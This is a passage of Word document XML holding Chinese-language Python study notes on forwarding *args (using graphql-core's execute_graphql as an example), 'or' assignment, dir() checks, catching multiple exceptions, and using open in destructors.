          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> args[0]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入，自己接收的传参的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">*args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> args[1:] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的参数进行传入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330282CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0260B431" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="_Toc159779885"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在函数中利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>互相进行传参</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
    </w:p>
    <w:p w14:paraId="52ED5FE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7784130A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graph.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>execute_graphql()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中看到的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB6D0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF386D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如这边</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45885D90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def graphql(*args, **kwargs):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # type: (*Any, **Any) -&gt; Union[ExecutionResult, Observable, Promise[ExecutionResult]]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return_promise = kwargs.get("return_promise", False)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if return_promise:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return execute_graphql_as_promise(*args, **kwargs)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重点分析，该方法就在几行之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return execute_graphql(*args, **kwargs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7A4265" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C51D171" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后作为接收参数，这里没有明写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，接收的别的函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是依次在下面声明的形参里赋值的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DCB119" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1282C5C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def execute_graphql(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    schema,  # type: GraphQLSchema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    request_string="",  # type: Union[Document, str]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    root_value=None,  # type: Any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    context_value=None,  # type: Optional[Any]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    variable_values=None,  # type: Optional[Any]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    operation_name=None,  # type: Optional[Any]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    middleware=None,  # type: Optional[Any]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    backend=None,  # type: Optional[Any]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    **execute_options  # type: Any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # type: (...) -&gt; Union[ExecutionResult, Observable, Promise[ExecutionResult]]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        if backend is None:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            backend = get_default_backend()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA37E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6EDC13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接把自己函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参到另一个函数中，基本上就是依次把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拆开给人家赋值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FDB23A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这么写，嗯，感觉上不太严谨，因为这么写的话，传参的时候单是列表本身，列表本身没有次序说明的话，则没有表明什么参数是用来干什么的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB0F13" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="006E01A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="442" w:name="_Toc159779886"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的赋值语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="442"/>
    </w:p>
    <w:p w14:paraId="17414589" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>起初在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graphQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中看到一个奇怪的传参的参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1551E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6689BB69" wp14:editId="4CE79BC3">
            <wp:extent cx="3056890" cy="1618615"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3056890" cy="1618615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F3F04C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>随后进行赋值测试，发现确实可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来进行传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7356643B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; a = '1' or 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5450165B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7682B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20808DC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; a = None or 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECBDE16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E13E72D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C98ACDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582BD247" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="443" w:name="_Toc159779887"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断遍历是否被定义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w14:paraId="242ED8A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dir()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数用于获取已定义对象列表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439E62B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C3FCA40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>' not in dir():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263ECFCB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该变量未被定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B670B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0F11BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if 'num' not in dir():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29288A21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1347E13E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4798C56A" w14:textId="6103BA8D" w:rsidR="004C452C" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="_Toc159779888"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>接受多种异常</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p w14:paraId="671893F4" w14:textId="34F0E496" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABC58A2" w14:textId="77772F56" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A10B0E" w14:textId="77777777" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31E782" w14:textId="77777777" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        y = square(input('Please enter a number\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B54BF" w14:textId="77777777" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103EFA28" w14:textId="77777777" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E161F0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>except ValueError as ve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F910B" w14:textId="77777777" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(type(ve), '::', ve)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3C3BE4" w14:textId="77777777" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E161F0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>except TypeError as te:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E2C61" w14:textId="5846FF01" w:rsidR="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(type(te), '::', te)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8B439" w14:textId="44EA59F2" w:rsidR="00D727FD" w:rsidRDefault="00D727FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6686E2D8" w14:textId="77777777" w:rsidR="00D727FD" w:rsidRDefault="00D727FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB96749" w14:textId="77777777" w:rsidR="00D727FD" w:rsidRDefault="00D727FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        y = square(input('Please enter a number\n'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC4E28" w14:textId="77777777" w:rsidR="00D727FD" w:rsidRDefault="00D727FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F5149" w14:textId="77777777" w:rsidR="00D727FD" w:rsidRDefault="00D727FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D727FD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>except (ValueError, TypeError) as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B1A467" w14:textId="23AE47EB" w:rsidR="00D727FD" w:rsidRDefault="00D727FD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print(type(e), '::', e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE4EB5" w14:textId="77777777" w:rsidR="00D91915" w:rsidRPr="00D91915" w:rsidRDefault="00D91915" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BB627C" w14:textId="12B76E05" w:rsidR="00E2040A" w:rsidRDefault="00E2040A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="445" w:name="_Toc159779889"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法在析构函数使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
    </w:p>
    <w:p w14:paraId="4ADA4EB2" w14:textId="7554AA6C" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1AED3E" w14:textId="3BD26716" w:rsidR="00D83806" w:rsidRDefault="00D83806" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D83806">
        <w:t>https://blog.csdn.net/mz02230909mz/article/details/111594937</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20421D29" w14:textId="77534D07" w:rsidR="00E2040A" w:rsidRDefault="00E2040A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BF018C" w14:textId="6575822A" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>atexit.register</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以构造出和</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
